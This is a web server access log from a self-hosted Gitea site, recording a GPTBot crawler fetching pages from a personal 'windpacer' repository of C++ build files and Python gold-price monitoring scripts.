"/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35741] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10003] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13441] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10262] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:17:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:17:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:17:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46762] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:17:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:17:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13536] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:17:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:17:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:17:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:17:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11967] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16318] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:17:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2fcontroller-cpp.md" [Client 74.7.227.38] [Length 17392] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" -[17/Feb/2026:17:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2fcontroller-cpp.md" [Client 74.7.227.38] [Length 22226] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" -[17/Feb/2026:17:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" -[17/Feb/2026:17:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py?display=source" [Client 74.7.227.38] [Length 18056] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" -[17/Feb/2026:17:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 11996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" -[17/Feb/2026:17:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 10817] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19407] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21411] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" -[17/Feb/2026:17:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17364] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" -[17/Feb/2026:17:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 11996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21366] [Gzip 7.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" -[17/Feb/2026:17:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12417] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 10806] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 10833] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" -[17/Feb/2026:17:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14498] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 